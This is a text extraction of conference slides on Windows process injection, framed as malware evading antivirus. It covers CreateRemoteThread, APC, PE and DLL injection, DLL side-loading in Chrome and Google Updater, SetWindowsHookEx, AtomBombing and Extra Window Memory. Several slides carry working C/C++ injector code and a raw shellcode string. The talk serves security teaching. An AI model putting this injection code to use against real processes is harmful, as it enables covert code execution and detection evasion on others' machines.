Slide 1

Slide 1 text

[email protected] Windows Injection 101: from Zero to ROP

Slide 2

Slide 2 text

./Bio✨ • ⾺馬聖豪, aaaddress1 aka adr • Chroot, TDOH • TDOHConf: 2016 議程組長 & 2017 活動組長 • 精通 C/C++、Windows 特性、逆向⼯工程 • Speaker: HITCON CMT 2015 HITCON CMT 2016 Lightning SITCON 2016 SITCON 2017 iThome#Chatbot 2017 BSidesLV 2016 ICNC'17 MC2015 CISC 2016 資訊安全基礎技術⼯工作坊 資安實務攻防研習營 ⼤大.⼤大.⼤大..⼤大概啦

Slide 3

Slide 3 text

[email protected] #murmur Some Bullsh*t after I submit this session

Slide 4

Slide 4 text

Slide 5

Slide 5 text

[email protected] cfp2017.hitcon.org “六、欲投稿者請於 2017 年年 7 ⽉月 14 ⽇日前,⾄至⼤大會投稿 系統 ( https://cfp2017.hitcon.org ) 註冊並上傳稿件,俾 利利議程委員審核,審核順序以投稿時間先後為準,如已 達本屆所需論⽂文數量量,⼤大會得提前截稿,故請儘速完成 投稿程序。”

Slide 6

Slide 6 text

[email protected] 2017/7/18? https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Slide 7

Slide 7 text

[email protected] 議程中請不要睡著 我也很想睡 請踴躍舉⼿手發⾔言 說好不插嘴的! 請勿吸菸、抽⼤大⿇麻、跑百米賽跑、玩碟仙、摸八圈、 跳八家將、炸鹽酥雞、到我背後抓寶、問我會不會FreeStyle ./CoC @Loki the Corgi

Slide 8

Slide 8 text

[email protected] Evolution Of Malware Long Story About How Malware Against AntiVirus

Slide 9

Slide 9 text

[email protected] R3m0t3-C0ntr0l;H4ck;C&C; B4ckdo0r;Sh311;B0tn3t;K3y l0gger;Ma1ware;Ro0t;W0rm; Zer0-D4y;Trojan;Exp10it;H 4ck;$cript;Packet;Cr4ck;R 4T;$ecuri7y;vu1ner4bi1i7y 4dmini$tr4t0r;Byp4$$ing;= Hacker Friendly World

Slide 10

Slide 10 text

[email protected] until AntiVirus;

Slide 11

Slide 11 text

[email protected] PE (Portable Executable);

Slide 12

Slide 12 text

[email protected] Virus Signature;

Slide 13

Slide 13 text

[email protected] PE (Portable Executable);

Slide 14

Slide 14 text

[email protected] DOS Header ‏DOS Program ‏NT Header ⋯⋯ PE File Header Optional Header

Slide 15

Slide 15 text

[email protected] DOS Header ‏DOS Program ‏NT Header ⋯⋯ 1. DOS Header starts with 'MZ'
 2. *(DWORD *)((DOS Header + 0x3c) point to NT Header PE File Header Optional Header File Header is also referred to as COFF header. Records NumberOfSections, TimeDateStamp,SizeOfOptionalHeade r, etc.

Slide 16

Slide 16 text

[email protected] Optional Header typedef struct _IMAGE_OPTIONAL_HEADER { WORD Magic; BYTE MajorLinkerVersion; BYTE MinorLinkerVersion; DWORD SizeOfCode; DWORD SizeOfInitializedData; DWORD SizeOfUninitializedData; DWORD AddressOfEntryPoint; DWORD BaseOfCode; DWORD BaseOfData; DWORD ImageBase; DWORD SectionAlignment; DWORD FileAlignment; WORD MajorOperatingSystemVersion; WORD MinorOperatingSystemVersion; WORD MajorImageVersion; WORD MinorImageVersion; WORD MajorSubsystemVersion; WORD MinorSubsystemVersion; DWORD Win32VersionValue; DWORD SizeOfImage; DWORD SizeOfHeaders; DWORD CheckSum; WORD Subsystem; WORD DllCharacteristics; DWORD SizeOfStackReserve; DWORD SizeOfStackCommit; DWORD SizeOfHeapReserve; DWORD SizeOfHeapCommit; DWORD LoaderFlags; DWORD NumberOfRvaAndSizes; IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; } IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER;

Slide 17

Slide 17 text

[email protected] ‏DOS Program ‏NT Header PE Optional Header Section Header 1 Section Header 2 ... Section Header N Section 1 Section 2 ... Section N Optional Header point to the first section header, and each sections between sizeof(PIMAGE_SECTION_HEADER) ⏞ Section Header Array

Slide 18

Slide 18 text

[email protected] typedef struct _IMAGE_SECTION_HEADER { BYTE Name[IMAGE_SIZEOF_SHORT_NAME]; union { DWORD PhysicalAddress; DWORD VirtualSize; } Misc; DWORD VirtualAddress; DWORD SizeOfRawData; DWORD PointerToRawData; DWORD PointerToRelocations; DWORD PointerToLinenumbers; WORD NumberOfRelocations; WORD NumberOfLinenumbers; DWORD Characteristics; }; ‏DOS Program ‏NT Header PE Optional Header Section Header 1 Section Header 2 ... Section Header N Section 1 Section 2 ... Section N Each Section Header point to their Section Data, and records detail. e.g. VirtualAddress, Section Name, SizeOfRawData.

Slide 19

Slide 19 text

[email protected] ‏DOS Program ‏NT Header PE Optional Header .text Header .rdata Header ... .text Section .rdata Section ... Section N void evil() { // connect with C&C ccLemon(); // do something evil eatYourFood(); } Each Section Header point to their Section Data, and records detail. e.g. VirtualAddress, Section Name, SizeOfRawData.

Slide 20

Slide 20 text

[email protected] PE DOS Program Evil Function NT Header ... .text Section bool chkVirus(PBYTE mem) { /* 55 - push ebp 8b ec - mov ebp, esp 81 EC 08 01 00 00 - sub esp,00000108 */ char Signature[] = "\x55\x8B\xEC\x81\xEC\x08\x01"; return !strncmp((char *)mem+0xdead, Signature, 7); } (DOS Header + 0xdead)

Slide 21

Slide 21 text

[email protected] So... How about Packer? UPX.exe

Slide 22

Slide 22 text

[email protected] Real-Time Detection;

Slide 23

Slide 23 text

[email protected] Malware.exe ... .text Section ... ... .text Section ... Ntdll.dll ... .text Section ... Kernel32.dll ... Process KiFastSystemCall __asm { sysenter } Windows Kernel (Ring0) normal eax = function index

Slide 24

Slide 24 text

[email protected] Malware.exe ... .text Section ... ... .text Section ... Ntdll.dll ... .text Section ... sandbox.dll ... Process KiFastSystemCall __asm { sysenter } Windows Kernel (Ring0) Hook @ring3

Slide 25

Slide 25 text

[email protected] KiFastSystemCall __asm { sysenter } Windows Kernel (Ring0) Malware.exe ... .text Section ... ... .text Section ... Ntdll.dll ... .text Section ... ... Process Malware.exe @ring0 Kernel32.dll

Slide 26

Slide 26 text

[email protected] Malware Code Messenger.exe ... .text Section ... ... Process Blind-Spot Of Anti-Virus Place malcode into memory Make malcode called

Slide 27

Slide 27 text

[email protected] Malware Code Messenger.exe ... .text Section ... ... Process RegOpenKey Windows Kernel (Ring0) under AV DeleteFile WriteProcessMemory

Slide 28

Slide 28 text

[email protected] Injection Art Introduction of Injection Tricks

Slide 29

Slide 29 text

[email protected] Issues Of Injection A.Place code in memory B.Execution C.Magic

Slide 30

Slide 30 text

[email protected] Place code in memory 1. Ntdll.NtWriteVirtualMemory,
 Kernel32.WriteProcessMemory
 2. User32.SetWindowLong 3. AtomBombing
 4. Exploit?

Slide 31

Slide 31 text

[email protected] 1. Ntdll.NtCreateThreadEx,
 Ntdll.RtlCreateUserThread,
 Kernel32.CreateRemoteThread
 2. Ntdll.NtQueueApcThread,
 Kernel32.QueueUserAPC
 3. Import Address Table Hook 4. SetThreadContext + ResumeThread 5. Extra Window Memory (EWM) Vunerability 6. Exploit? Execution

Slide 32

Slide 32 text

[email protected] ✨Magic✨ 1. Rundll 2. Registry Modification 3. DLL Side-Loading 4. SetWindowsHookEx 5. Shims

Slide 33

Slide 33 text

[email protected] Injection Art •Rundll32 •DLL Side-Loading •CreateRemoteThread •PE Injection •Process Hollowing •SetWindowsHookEx •Registry Modification •APC Injection & AtomBombing •Extra Window Memory (EWM) •IAT Hooking & Inline Hooking •Shims

Slide 34

Slide 34 text

[email protected] Injection Art 0 Baby Steps

Slide 35

Slide 35 text

[email protected] Rundll support.microsoft.com/en-us/help/164787/info-windows-rundll-and-rundll32-interface

Slide 36

Slide 36 text

Slide 37

Slide 37 text

[email protected] Registry Modification Debugger Value (IFEO) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Image File Execution Options\ AppInit_DLLs HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ Windows\AppInit_DLLs\

Slide 38

Slide 38 text

[email protected] Injection Art 1 Typical Code Injection

Slide 39

Slide 39 text

[email protected] Memory Map (Immunity Debugger)

Slide 40

Slide 40 text

Malware.exe Ntdll.dll ... Process Kerne32.dll User32.dll ... Ntdll.dll ... Process Kerne32.dll User32.dll ... Messenger.exe Ntdll.dll ... Process Kerne32.dll User32.dll ... Chrome.exe Stack Memory Stack Memory Stack Memory Fixed ASLR Low Heigh Malware.exe

Slide 41

Slide 41 text

[email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... Ntdll.dll ... Process Kernel32.dll User32.dll ... Chrome.exe OpenProcess() return access handle

Slide 42

Slide 42 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Memory Allocated VirtualAllocEx() Allocate a new space to store shellcode Kernel32.dll Kernel32.dll

Slide 43

Slide 43 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Shellcode WriteProcessMemory() Copy shellcode to memory space Kernel32.dll Kernel32.dll

Slide 44

Slide 44 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Shellcode CreateRemoteThread Thread Execute shellcode Kernel32.dll Kernel32.dll

Slide 45

Slide 45 text

[email protected] HANDLE get_process_handle(wchar_t proc_name[]) { HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); PROCESSENTRY32 process = { 0 }; process.dwSize = sizeof(process); if (Process32First(snapshot, &process)) { do { if (!wcscmp(process.szExeFile, proc_name)) break; } while (Process32Next(snapshot, &process)); } CloseHandle(snapshot); if (!process.th32ProcessID) return NULL; return OpenProcess(PROCESS_ALL_ACCESS, 1, process.th32ProcessID); } OpenProcess

Slide 46

Slide 46 text

[email protected] HANDLE access_token = get_process_handle(L"chrome.exe"); LPVOID mem = VirtualAllocEx( access_token, NULL, strlen(shellcode + 1), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE ); WriteProcessMemory( access_token, mem, shellcode, strlen(shellcode + 1), NULL ); CreateRemoteThread( access_token, NULL, 0, (LPTHREAD_START_ROUTINE)mem, 0, 0, NULL );

Slide 47

Slide 47 text

[email protected] Injection Art 1.1 Typical Code Injection via APC

Slide 48

Slide 48 text

[email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... Ntdll.dll ... Process Kernel32.dll User32.dll ... Chrome.exe OpenProcess() return access handle

Slide 49

Slide 49 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Memory Allocated VirtualAllocEx() Allocate a new space to store shellcode Kernel32.dll Kernel32.dll

Slide 50

Slide 50 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Shellcode WriteProcessMemory() Copy shellcode to memory space Kernel32.dll Kernel32.dll

Slide 51

Slide 51 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Shellcode CreateToolhelp32Snapshot() Thread 1 Thread 2 Thread 3 Thread 4 Thread ID Process 1 Chrome.exe 2 Chrome.exe ... N XXXX.exe Kernel32.dll Kernel32.dll

Slide 52

Slide 52 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Shellcode QueueUserAPC() Thread 1 Thread 2 Thread 3 Thread 4 Kernel32.dll Kernel32.dll

Slide 53

Slide 53 text

[email protected] void apc_invoke(DWORD pid, LPVOID mem_func) { auto hSnapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0 ); THREADENTRY32 te = { sizeof(te) }; if (Thread32First(hSnapshot, &te)) { do { if (te.th32OwnerProcessID != pid) continue; HANDLE hThread = OpenThread( THREAD_SET_CONTEXT, FALSE, te.th32ThreadID ); if (hThread) QueueUserAPC((PAPCFUNC)mem_func, hThread, NULL); } while (::Thread32Next(hSnapshot, &te)); } } APC Inject

Slide 54

Slide 54 text

[email protected] Injection Art 2 PE Injection

Slide 55

Slide 55 text

[email protected] Issues of Code Inject Hard to develop Hard to repair Portability? char *shellcode = "\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" "\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" "\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" "\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" "\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" "\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" "\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" "\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" "\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" "\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" "\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" "\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" "\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" "\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" "\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68" "\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68" "\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57" "\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" "\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" "\x69\x74\x54\x53\xff\xd6\x57\xff\xd0";

Slide 56

Slide 56 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe OpenProcess() return access handle Kernel32.dll Kernel32.dll

Slide 57

Slide 57 text

Slide 58

Slide 58 text

[email protected] PE DOS Program NtHeader ... OptionalHeader .ImageBase (0x400000) .SizeOfHeaders FileHeader .NumberOfSections .AddressOfEntryPoint SizeOfHeaders Section Header 1 (.text) Section Header 2 Section Header 3 Section Data 1 (.text) ... sizeof(Section Header) = IMAGE_SIZEOF_SECTION_HEADER =40(fixed) .SizeOfImage

Slide 59

Slide 59 text

[email protected] PE NtHeader ... IMAGE SECTION HEADER Section Header 1 (.text) Section Header 2 Section Header 3 Section Data 1 (.text) ... .VirtualAddress .PointerToRawData .SizeOfRawData SizeOfRawData SectionHeader[i] = PIMAGE_SECTION_HEADER( NtHeader + sizeof(IMAGE_NT_HEADERS) + IMAGE_SIZEOF_SECTION_HEADER * index ); DOS Program

Slide 60

Slide 60 text

[email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... ... Process Chrome Memory Allocated VirtualAllocEx() Allocate memory at ImageBase(0x400000) (Length = SizeOfImage) 0x400000

Slide 61

Slide 61 text

[email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... ... Process Chrome WriteProcessMemory() at ImageBase + 0x00 Copy SizeOfHeaders bytes from (malware.exe + 0x00) Image Header

Slide 62

Slide 62 text

[email protected] DOS Program ... malware.exe ... Process Chrome NtHeader Section Header 1 Section Data 1 ... .VirtualAddress = 0xbeef Space@beef .PointerToRawData .SizeOfRawData copy SizeOfRaowData bytes from PointerToRawData via WriteProcessMemory() Image Header

Slide 63

Slide 63 text

[email protected] Space@beef Section Header 1 ... malware.exe ... Process Chrome NtHeader Section Header2 Section Data 2 ... .VirtualAddress = 0xcafe Space@cafe .PointerToRawData .SizeOfRawData copy SizeOfRaowData bytes from PointerToRawData via WriteProcessMemory() Image Header DOS Program

Slide 64

Slide 64 text

[email protected] .text ... Process Chrome Section 2 Section 3 ... Malware.exe Ntdll.dll Process User32.dll SetThreadContext() & ResumeThread() eax = AddressOfEntryPoint ... Malware.exe Image Header Kernel32.dll

Slide 65

Slide 65 text

Slide 66

Slide 66 text

Slide 67

Slide 67 text

[email protected] Injection Art 3 DLL Injection

Slide 68

Slide 68 text

[email protected] LoadLibrary LoadLibraryA("junk.dll") ... .text Section ... Ntdll.dll ... Process Program.exe Kernel32.dll User32.dll

Slide 69

Slide 69 text

[email protected] LoadLibrary LoadLibraryA("junk.dll") ... .text Section ... Ntdll.dll ... Process Program.exe Kernel32.dll User32.dll ... .text Section ... Junk.dll

Slide 70

Slide 70 text

[email protected] LoadLibrary LoadLibraryA("junk.dll") ... .text Section ... Ntdll.dll ... Process Program.exe Kernel32.dll User32.dll ... ... Junk.dll .text Section Invoke DllMain() or DllEntry()

Slide 71

Slide 71 text

[email protected] Malware.exe Ntdll.dll ... Process Kernel32.dll User32.dll ... Ntdll.dll ... Process Kernel32.dll User32.dll ... Chrome.exe OpenProcess() return access handle

Slide 72

Slide 72 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome Memory Allocated VirtualAllocEx() Allocate memory to store DLL path Ntdll.dll ... User32.dll ... Malware.exe Kernel32.dll Kernel32.dll

Slide 73

Slide 73 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome C:\hola.dll Ntdll.dll ... User32.dll ... WriteProcessMemory() Copy DLL path to memory space Malware.exe Kernel32.dll Kernel32.dll

Slide 74

Slide 74 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome C:\hola.dll Ntdll.dll ... User32.dll ... Malware.exe Fixed Kernel32.dll Kernel32.dll

Slide 75

Slide 75 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome C:\hola.dll Ntdll.dll ... User32.dll ... Malware.exe GetProcAddress( LoadLibrary("kernel32.dll"), "LoadLibraryA" ); Kernel32.dll Kernel32.dll

Slide 76

Slide 76 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Process Chrome C:\hola.dll Ntdll.dll ... User32.dll ... Malware.exe LoadLibraryA CreateRem oteThread parameter Kernel32.dll Kernel32.dll

Slide 77

Slide 77 text

Slide 78

Slide 78 text

[email protected] Injection Art 4 DLL Side-Loading

Slide 79

Slide 79 text

news.softpedia.com/news/dll-hijacking-issue-plagues-products-like-firefox-chrome-itunes-openoffice-500060.shtml

Slide 80

Slide 80 text

news.softpedia.com/news/dll-hijacking-issue-plagues-products-like-firefox-chrome-itunes-openoffice-500060.shtml DLL Hijacking Issue

Slide 81

Slide 81 text

[email protected] Google Chrome

Slide 82

Slide 82 text

[email protected] Google Updater

Slide 83

Slide 83 text

[email protected] Google Updater

Slide 84

Slide 84 text

[email protected] int __fastcall sub_2F64CA(HMODULE hModule, char ch) { /* ... */ if ( GetModuleFileNameW(hModule, &Filename, 0x104u) && ( PathRemoveFileSpecW(&Filename), memcpy(&pszPath, &Filename, 260), PathAppendW(&pszPath, L"goopdate.dll") )) { if (sub_2F6211(&pszPath)) { // make v4 point to goopdate.dll sub_2F68D4(&pszPath, sub_2FAB00(&pszPath)); result = 0; } /* ... */ }

Slide 85

Slide 85 text

Google Updater

Slide 86

Slide 86 text

[email protected] LoadLibrary LoadLibraryA("goopdate.dll") ... .text Section ... Ntdll.dll ... Process GoogleUpdate Kernel32.dll User32.dll

Slide 87

Slide 87 text

[email protected] LoadLibrary ... .text Section ... Ntdll.dll ... Process GoogleUpdate Kernel32.dll User32.dll ... .text Section ... goopdate.dll LoadLibraryA("goopdate.dll")

Slide 88

Slide 88 text

[email protected] LoadLibrary LoadLibraryA("goopdate.dll") ... .text Section ... Ntdll.dll ... Process GoogleUpdate Kernel32.dll User32.dll ... ... goopdate.dll .text Section Invoke DllEntry()

Slide 89

Slide 89 text

Slide 90

Slide 90 text

[email protected] ✨Magic✨ DLL Side-Loading & Advanced Techniques

Slide 91

Slide 91 text

[email protected] Issues Of Windows API

Slide 92

Slide 92 text

[email protected] GetICMProfile

Slide 93

Slide 93 text

[email protected] Logics of Chrome after Loading Pages

Slide 94

Slide 94 text

[email protected] The logics in WinAPI -- GetICMProfile (Initialization)

Slide 95

Slide 95 text

[email protected] IcmInitialize()

Slide 96

Slide 96 text

[email protected] Ollydbg: Chrome

Slide 97

Slide 97 text

[email protected] How LoadLibrary() Works

Slide 98

Slide 98 text

[email protected] KernelBase.dll

Slide 99

Slide 99 text

[email protected] {CURRENT_PATH}; C:\Windows\system32; C:\Windows\system; C:\Windows; .; C:\Program Files\Windows C:\Windows\System32\WindowsPowerShell\v1.0\; ... BaseGetProcessDllPath

Slide 100

Slide 100 text

[email protected] for loop tries to find DLL in each system environment directory

Slide 101

Slide 101 text

[email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... GetICMProfile Kernel32.dll

Slide 102

Slide 102 text

[email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... GetICMProfile GetICMProfile() Kernel32.dll

Slide 103

Slide 103 text

[email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... GetICMProfile GetICMProfile() Kernel32.dll LoadLibraryW("mscms.dll");

Slide 104

Slide 104 text

[email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... GetICMProfile GetICMProfile() Kernel32.dll LoadLibraryW LoadLibraryW("mscms.dll");

Slide 105

Slide 105 text

[email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... Kernel32.dll LoadLibraryW LoadLibraryW("mscms.dll"); ...\Chrome\Application; C:\Windows\system32; C:\Windows\system; C:\Windows; ...

Slide 106

Slide 106 text

[email protected] GetICMProfile Ntdll.dll ... Process GDI32.dll ... Chrome.exe ... Kernel32.dll LoadLibraryW LoadLibraryW("mscms.dll"); ...\Chrome\Application\mscms.dll; C:\Windows\system32\mscms.dll; C:\Windows\system\mscms.dll; C:\Windows\mscms.dll; ... mscms.dll

Slide 107

Slide 107 text

[email protected] Chrome Lastest Version 60.0.3112.101

Slide 108

Slide 108 text

[email protected] Chrome Lastest Version 60.0.3112.101

Slide 109

Slide 109 text

[email protected] Visual Style UI Rendering (Issues Of UxTheme.dll)

Slide 110

Slide 110 text

[email protected] Hexedit & Winspy

Slide 111

Slide 111 text

[email protected] cls_Forms_TCustomDockForm Forms::TCustomDockForm::Loaded(void) HexEdit

Slide 112

Slide 112 text

[email protected] Dwmapi:: DwmExtendFrameIntoClientArea

Slide 113

Slide 113 text

[email protected] UI Visual Style Issue

Slide 114

Slide 114 text

[email protected] UxTheme::SetWindowTheme

Slide 115

Slide 115 text

[email protected] UxTheme::IsCompositionActive call dwmapi::DwmIsCompositionEnabled

Slide 116

Slide 116 text

[email protected] UxTheme::IsCompositionActive call dwmapi::DwmIsCompositionEnabled

Slide 117

Slide 117 text

[email protected] •HEXEdit •7Zip •WinSpy •LoLTWLauncher •.NET Program •Borland C++ Program It allow us to hijack Visual Style UI Program

Slide 118

Slide 118 text

[email protected] Injection Art 5 SetWindowHooksEx

Slide 119

Slide 119 text

[email protected] SetWindowsHookEx HHOOK WINAPI SetWindowsHookEx ( _In_ int idHook, /* Hook Type */ _In_ HOOKPROC lpfn, /* function */ _In_ HINSTANCE hMod, /* module */ _In_ DWORD dwThreadId /* thread id */ );

Slide 120

Slide 120 text

[email protected] SetWindowsHookEx 4 WH_CALLWNDPROC 12 WH_CALLWNDPROCRET 5 WH_CBT 9 WH_DEBUG 11 WH_FOREGROUNDIDLE 3 WH_GETMESSAGE 1 WH_JOURNALPLAYBACK 0 WH_JOURNALRECORD 2 WH_KEYBOARD 13 WH_KEYBOARD_LL 7 WH_MOUSE 14 WH_MOUSE_LL -1 WH_MSGFILTER 10 WH_SHELL 6 WH_SYSMSGFILTER

Slide 121

Slide 121 text

[email protected] Codes of Inject.dll LRESULT WINAPI msgProg(int code, WPARAM wParam, LPARAM lParam) { if (!disp) MessageBoxA(0, "Hello World", "HITCON 2017", 0); disp = true; return CallNextHookEx(NULL, code, wParam, lParam); } extern "C" { __declspec(dllexport) int hookStart() { hHook = SetWindowsHookEx(WH_GETMESSAGE, msgProg, hMod, 0); return !!hHook; } __declspec(dllexport) int hookStop() { return hHook && UnhookWindowsHookEx(hHook); } }

Slide 122

Slide 122 text

[email protected] Codes of Injector.exe int main() { if (auto mod = LoadLibraryA("inject.dll")) { (int(*)())GetProcAddress ( LoadLibraryA("inject.dll"), "hookStart" )(); getchar(); } return 0; }

Slide 123

Slide 123 text

[email protected] DLL Inject

Slide 124

Slide 124 text

Slide 125

Slide 125 text

[email protected] Injection Art 7 AtomBombing

Slide 126

Slide 126 text

[email protected] https://breakingmalware.com/injection-techniques/atombombing-brand-new-code-injection-for-windows

Slide 127

Slide 127 text

[email protected] GlobalAddAtom

Slide 128

Slide 128 text

[email protected] GlobalGetAtomName

Slide 129

Slide 129 text

[email protected] NtQueueApcThread NTSTATUS NtQueueApcThread ( HANDLE ThreadHandle, PKNORMAL_ROUTINE ApcRoutine, PVOID ApcContext, PVOID Argument1, PVOID Argument2 ); NtQueueApcThread: mov eax, 10Dh ; NtQueueApcThread mov edx, 7FFE0300h call dword ptr [edx]; KiFastSystemCall retn 14h

Slide 130

Slide 130 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Memory Allocated VirtualAllocEx() Allocate a new space to store shellcode Kernel32.dll Kernel32.dll

Slide 131

Slide 131 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Shellcode CreateToolhelp32Snapshot() Thread 1 Thread 2 Thread 3 Thread 4 Thread ID Process 1 Chrome.exe 2 Chrome.exe ... N XXXX.exe Kernel32.dll Kernel32.dll

Slide 132

Slide 132 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Shellcode GlobalGetAtomNameW Shellcode NtQueueApcThread() Thread 1 Thread 2 Thread 3 Thread 4 Kernel32.dll Kernel32.dll

Slide 133

Slide 133 text

[email protected] Malware.exe Ntdll.dll ... Process User32.dll ... Ntdll.dll ... Process User32.dll ... Chrome.exe Shellcode NtQueueApcThread() Thread 1 Thread 2 Thread 3 Thread 4 Kernel32.dll Kernel32.dll

Slide 134

Slide 134 text

[email protected] Injection Art 8 Extra Window Memory Vunerability

Slide 135

Slide 135 text

[email protected] Shell_TrayWnd

Slide 136

Slide 136 text

[email protected] int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam) { /* Initialization for Window */ if (!*lParam) return 0; else if ( Msg == WM_NCCREATE) { *(*lParam + 4) = hWnd; SetWindowLongW(hWnd, 0, *lParam); /* Custom WndProc */ return (void(*)())(*lParam + 8) ( *lParam, hWnd, WM_NCCREATE, wParam, lParam ); } /* ... Deal with normal Window Event ... */ }

Slide 137

Slide 137 text

[email protected] int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam) { /* ... Initialization for Window ... */ /* Deal with normal Window Event */ DWORD wndSelf = GetWindowLongW(hWnd, 0); DWORD lParama; if ( wndSelf ) { /* InterlockedIncrement */ (void(*)())*wndSelf(wndSelf); /* Custom WndProc */ lParama = (*wndSelf+0x08)(wndSelf, hWnd, Msg, wParam, lParam); if ( Msg == WM_NCDESTROY ) { SetWindowLongW(hWnd, 0, 0); *(wndSelf+0x04) = 0; } /* Destroy Task */ (void(*)())(*wndSelf+0x04)(wndSelf); } else lParama = SHDefWindowProc(hWnd, Msg, wParam, lParam); return lParama; }

Slide 138

Slide 138 text

[email protected] int s_WndProc(HWND hWnd, DWORD Msg, DWORD wParam, DWORD lParam) { /* ... Initialization for Window ... */ /* Deal with normal Window Event */ DWORD wndSelf = GetWindowLongW(hWnd, 0); DWORD lParama; if ( wndSelf ) { /* InterlockedIncrement */ (void(*)())*wndSelf(wndSelf); /* Custom WndProc */ lParama = (*wndSelf+0x08)(wndSelf, hWnd, Msg, wParam, lParam); if ( Msg == WM_NCDESTROY ) { SetWindowLongW(hWnd, 0, 0); *(wndSelf+0x04) = 0; } /* Destroy Task */ (void(*)())(*wndSelf+0x04)(wndSelf); } else lParama = SHDefWindowProc(hWnd, Msg, wParam, lParam); return lParama; }

Slide 139

Slide 139 text

[email protected] Malware.exe ... Process ... Process Explorer.exe Shell_TrayWnd +0 lParam (vtable) +4 hWnd ... Window Class

Slide 140

Slide 140 text

[email protected] ... Process ... Process Explorer.exe Shell_TrayWnd +4 hWnd ... VirtualAllocEx() Shellcode VirtualAllocEx() & WriteProcessMemory() +0 lParam (this) +4 hWnd Fake Memory Layout ... Malware.exe +0 lParam (vtable)

Slide 141

Slide 141 text

[email protected] ... Process ... Process Explorer.exe Shell_TrayWnd +4 hWnd ... WriteProcessMemory() Shellcode +0 Shellcode addr +4 Point to +0 Fake Memory Layout ... Malware.exe +0 lParam (vtable)

Slide 142

Slide 142 text

[email protected] Shell_TrayWnd +0 Point to (Fake Memory +4) +4 hWnd ... ... Process ... Process Explorer.exe Shell_TrayWnd ... Shellcode +0 Shellcode addr +4 Point to +0 Fake Memory Layout ... SetWindowLong() Malware.exe

Slide 143

Slide 143 text

[email protected] +0 Point to (Fake Memory +4) Shell_TrayWnd +4 hWnd ... ... Process ... Process Explorer.exe Shell_TrayWnd Shellcode +0 Shellcode addr +4 Point to +0 Fake Memory Layout ... SendMessage, SendNotifyMessage, or PostMessage to Shell_TrayWnd Malware.exe

Slide 144

Slide 144 text

Slide 145

Slide 145 text

[email protected] PowerLoadEx

Slide 146

Slide 146 text

Slide 147

Slide 147 text

